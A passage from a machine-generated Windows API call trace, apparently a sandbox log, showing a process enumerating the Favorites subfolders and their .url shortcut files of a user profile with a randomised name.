cAlternateFileName="SUGGES~1.URL")) returned 1 [0041.327] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0041.328] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.328] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.328] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.328] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.328] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links", lpFilePart=0x0) returned 0x2d [0041.328] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\", lpFilePart=0x0) returned 0x2e [0041.328] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.328] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.329] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0041.329] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x52cd1930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52fcb4b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xec, dwReserved0=0x0, dwReserved1=0x0, cFileName="Suggested Sites.url", cAlternateFileName="SUGGES~1.URL")) returned 1 [0041.329] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 1 [0041.329] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0041.329] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.329] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.329] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.329] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpFilePart=0x0) returned 0x3a [0041.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpFilePart=0x0) returned 0x3b [0041.330] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.332] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.332] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0041.332] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0041.332] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0041.332] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0041.332] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0041.333] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.333] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.333] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.333] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.333] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites", lpFilePart=0x0) returned 0x3a [0041.334] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\", lpFilePart=0x0) returned 0x3b [0041.334] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.334] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.335] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0041.335] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0041.335] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Home.url", cAlternateFileName="MICROS~3.URL")) returned 1 [0041.335] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0041.335] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 1 [0041.335] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x86, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url", cAlternateFileName="MICROS~1.URL")) returned 0 [0041.336] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.336] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.336] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.336] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpFilePart=0x0) returned 0x34 [0041.337] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpFilePart=0x0) returned 0x35 [0041.337] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.338] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.338] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0041.338] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0041.339] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url", cAlternateFileName="MSNMON~1.URL")) returned 1 [0041.339] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0041.339] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url", cAlternateFileName="")) returned 1 [0041.339] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 1 [0041.339] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.339] FindClose (in: hFindFile=0x406108 | out: hFindFile=0x406108) returned 1 [0041.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites", lpFilePart=0x0) returned 0x34 [0041.340] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\", lpFilePart=0x0) returned 0x35 [0041.340] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x406108 [0041.341] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe4d4ebc, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.341] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url", cAlternateFileName="MSNAUT~1.URL")) returned 1 [0041.341] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url", cAlternateFileName="MSNENT~1.URL")) returned 1 [0041.342] FindNextFileW (in: hFindFile=0x406108, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, 